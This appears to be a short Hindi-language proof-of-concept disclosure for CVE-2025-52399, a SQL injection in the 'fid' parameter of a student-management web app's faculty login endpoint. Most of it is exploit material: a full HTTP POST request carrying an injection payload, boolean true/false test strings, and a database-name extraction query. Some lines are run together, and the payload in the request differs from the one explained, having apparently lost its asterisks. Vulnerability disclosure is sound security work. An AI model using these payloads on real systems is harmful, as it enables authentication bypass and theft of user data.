
CVE-2025-52399 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, जो Institute-of-Current-Students एप्लिकेशन में loginlinkfaculty एंडपॉइंट के माध्यम से प्रमाणीकरण बाईपास और डेटा निष्कर्षण के लिए SQL इंजेक्शन का प्रदर्शन करता है।
Institute-of-Current-Students एप्लिकेशन में loginlinkfaculty एंडपॉइंट, fid POST पैरामीटर के माध्यम से SQL इंजेक्शन के लिए असुरक्षित है। SQL क्वेरी में उपयोग करने से पहले पैरामीटर को उचित रूप से साफ नहीं किया जाता है, जिससे दूरस्थ हमलावर मनमानी SQL कमांड निष्पादित कर सकते हैं।
/loginlinkfaculty (POST)fidicsnewhttp POST /Institute-of-Current-Students/loginlinkfaculty HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded
fid=-1'+OR+321=6+AND+000942=000942--&pass=example
✅ -1' OR 3*2*1=6 AND 000942=000942 -- → सत्य
❌ -1' OR 2*3=4 AND 000942=000942 -- → असत्य
SELECT database(); -- 'icsnew' लौटाता है
Isroil Mustafoqulov